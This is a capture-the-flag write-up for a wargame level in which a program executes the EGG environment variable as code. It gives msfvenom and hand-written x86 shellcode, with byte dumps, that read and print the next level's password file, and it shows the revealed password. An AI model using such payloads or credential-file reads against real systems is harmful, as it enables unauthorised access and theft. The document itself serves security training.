Narnia1 - narnia2


Code

//narnia1@melinda:/narnia$ cat narnia1.c 
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
 
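/*
 * Entry point. Takes the value of the environment variable EGG and calls
 * it as if it were a function, i.e. the raw bytes of EGG run with this
 * process's privileges. That is the deliberate flaw of this level:
 * nothing validates EGG, so whoever controls the environment controls
 * what this process executes (an arbitrary-code-execution sink).
 *
 * Exits with status 1 when EGG is unset. Returns 0 only if the called
 * code returns; the nasm payload later on this page ends with an exit
 * syscall instead, so the return is normally never reached.
 */
int main(){
	int (*ret)();
	char *egg = getenv("EGG");   /* getenv() and exit() are declared in <stdlib.h> */

	if(egg==NULL){
		printf("Give me something to execute at the env-variable EGG\n");
		exit(1);
	}

	printf("Trying to execute EGG!\n");
	/* C does not convert an object pointer to a function pointer implicitly;
	 * the original relied on that (a constraint violation), so the cast is
	 * made explicit. Behaviour is unchanged: control jumps into EGG's bytes. */
	ret = (int (*)())egg;
	ret();

	return 0;
}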


Solution

So this code will just execute whatever is in the shell environment variable EGG as if it were shellcode... This is like a shellcode tester. I guess the point is to teach people how to use shellcode and environment variables? Either way, this one is simple. We first must generate shellcode. For this I was lazy and just used msfvenom on my local machine.

$ sudo msfvenom -b '\x00' -p linux/x86/exec CMD="cat /etc/narnia_pass/narnia2" -f python
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 91 (iteration=0)
buf =  ""
buf += "\xb8\x8f\x21\xc1\x8c\xdb\xdc\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x11\x31\x47\x12\x03\x47\x12\x83\x48\x25\x23"
buf += "\x79\x3c\x2d\xfb\x1b\x92\x57\x93\x36\x71\x11\x84\x21"
buf += "\x5a\x52\x23\xb2\xcc\xbb\xd1\xdb\x62\x4d\xf6\x4e\x92"
buf += "\x50\xf9\x6e\x62\x08\x98\x1a\x42\xe1\x3f\x97\xe1\xd2"
buf += "\xd1\x36\x97\x42\x47\xd8\x08\xeb\xf6\x69\xc5\x24\x97"
buf += "\xec\x5b\x55\x0e\x8e\xa9\xa9\x87\x03\x44\x48\xea\x24"


So now we just need to:

  • format this into a string
  • convert that to hex
  • load into EGG and export
  • and run our program
narnia1@melinda:/narnia$ export EGG=$( echo -ne "\xb8\x8f\x21\xc1\x8c\xdb\xdc\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x11\x31\x47\x12\x03\x47\x12\x83\x48\x25\x23\x79\x3c\x2d\xfb\x1b\x92\x57\x93\x36\x71\x11\x84\x21\x5a\x52\x23\xb2\xcc\xbb\xd1\xdb\x62\x4d\xf6\x4e\x92\x50\xf9\x6e\x62\x08\x98\x1a\x42\xe1\x3f\x97\xe1\xd2\xd1\x36\x97\x42\x47\xd8\x08\xeb\xf6\x69\xc5\x24\x97\xec\x5b\x55\x0e\x8e\xa9\xa9\x87\x03\x44\x48\xea\x24");
 
narnia1@melinda:/narnia$ /narnia/narnia1
Trying to execute EGG!
nairiepecu


That works... I also decided to just write some nasm for a payload as well.

;$ cat narina1.asm 
; Linux/x86 (32-bit) position-independent payload: open the path stored
; after _there, read up to 50 bytes of it into a stack buffer, write that
; buffer to stdout, then exit. Calling convention is the i386 Linux one:
; syscall number in eax, arguments in ebx/ecx/edx, trap via int 0x80.
; The jmp _there / call _here pair pushes the address of the path string
; so it can be popped without knowing where the code has been loaded.
global _start
 
_start:
	jmp _there
_here:
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; open(ptrToString, Readonly)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 5          ; sys_open
	pop ebx            ; ebx = address of the path string, pushed by 'call _here'
	xor ecx,ecx        ; flags = 0 (read-only)
	int 0x80           ; eax = fd on success, negative errno on failure (not checked)
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Read(fd, buffer, buffersize)
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	mov ebx, eax  ; Move the file descriptor to ebx
;	sub esp, 50   ; Give some space on the stack
	xor eax, eax
	mov al, 3          ; sys_read
	mov ecx, esp       ; buffer = current stack pointer; no space is reserved
	                   ; (the 'sub esp, 50' above is commented out), so the
	                   ; read overwrites whatever already sits at esp
	xor edx, edx
	mov dl, 50         ; count = 50 bytes
	int 0x80           ; eax = bytes read (or negative errno)
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; Write()
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; write(1, buf, 50): ecx and edx are reused unchanged from the read above.
	; NOTE(review): only al is set here, so the upper bytes of eax are whatever
	; read() left there; that is 0 for a short read but not for an error return.
	; NOTE(review): edx is still 50, not the number of bytes actually read, so
	; the whole 50-byte stack buffer is written, including bytes past the file
	; contents.
	mov al, 4          ; sys_write
	xor ebx, ebx
	inc ebx            ; fd = 1 (stdout)
	int 0x80
 
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	; exit
	;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	xor eax, eax
	mov al, 1          ; sys_exit
	xor ebx, ebx       ; status = 0
	int 0x80
 
_there:
	call _here         ; pushes the address of the string below, then jumps back
	; No terminating zero byte follows the path (a 0x00 inside the payload would
	; cut the environment string short). NOTE(review): presumably the NUL that
	; ends the EGG variable itself terminates the path for open() — confirm.
	db '/etc/narnia_pass/narnia2'


I build it and extract the shellcode bytes using some of my scripts.

$ ./buildnasm.sh narina1.asm 
 
 [*] Compiling narina1.asm with NASM...Done!
 [*] Linking the object file with ld...Done!
 [*] Removing Object file narina1.o...Done!
 [*] Done Son!
 
$ ./extract_shellcode.sh narina1
 
..::[ NASM Shellcode Extractor ]::..
 
-=[ Object Dump ]=-
 
Disassembly of section .text:
08048060 <_start>:
 8048060:	eb 26                	jmp    8048088 <_there>
08048062 <_here>:
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	b0 05                	mov    $0x5,%al
 8048066:	5b                   	pop    %ebx
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	cd 80                	int    $0x80
 804806b:	89 c3                	mov    %eax,%ebx
 804806d:	31 c0                	xor    %eax,%eax
 804806f:	b0 03                	mov    $0x3,%al
 8048071:	89 e1                	mov    %esp,%ecx
 8048073:	31 d2                	xor    %edx,%edx
 8048075:	b2 32                	mov    $0x32,%dl
 8048077:	cd 80                	int    $0x80
 8048079:	b0 04                	mov    $0x4,%al
 804807b:	31 db                	xor    %ebx,%ebx
 804807d:	43                   	inc    %ebx
 804807e:	cd 80                	int    $0x80
 8048080:	31 c0                	xor    %eax,%eax
 8048082:	b0 01                	mov    $0x1,%al
 8048084:	31 db                	xor    %ebx,%ebx
 8048086:	cd 80                	int    $0x80
08048088 <_there>:
 8048088:	e8 d5 ff ff ff       	call   8048062 <_here>
 804808d:	2f                   	das    
 804808e:	65 74 63             	gs je  80480f4 <_there+0x6c>
 8048091:	2f                   	das    
 8048092:	6e                   	outsb  %ds:(%esi),(%dx)
 8048093:	61                   	popa   
 8048094:	72 6e                	jb     8048104 <_there+0x7c>
 8048096:	69 61 5f 70 61 73 73 	imul   $0x73736170,0x5f(%ecx),%esp
 804809d:	2f                   	das    
 804809e:	6e                   	outsb  %ds:(%esi),(%dx)
 804809f:	61                   	popa   
 80480a0:	72 6e                	jb     8048110 <_there+0x88>
 80480a2:	69                   	.byte 0x69
 80480a3:	61                   	popa   
 80480a4:	32                   	.byte 0x32
 
-=[ Extracted Shellcode (Length: 69) ]=-
 
\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x32


The above is made to read the password file, print it, and quit.

narnia1@melinda:/narnia$ export EGG=$( echo -ne "\xeb\x26\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\x31\xc0\xb0\x03\x89\xe1\x31\xd2\xb2\x32\xcd\x80\xb0\x04\x31\xdb\x43\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd5\xff\xff\xff\x2f\x65\x74\x63\x2f\x6e\x61\x72\x6e\x69\x61\x5f\x70\x61\x73\x73\x2f\x6e\x61\x72\x6e\x69\x61\x32"); 
 
narnia1@melinda:/narnia$ /narnia/narnia1; echo
Trying to execute EGG!
nairiepec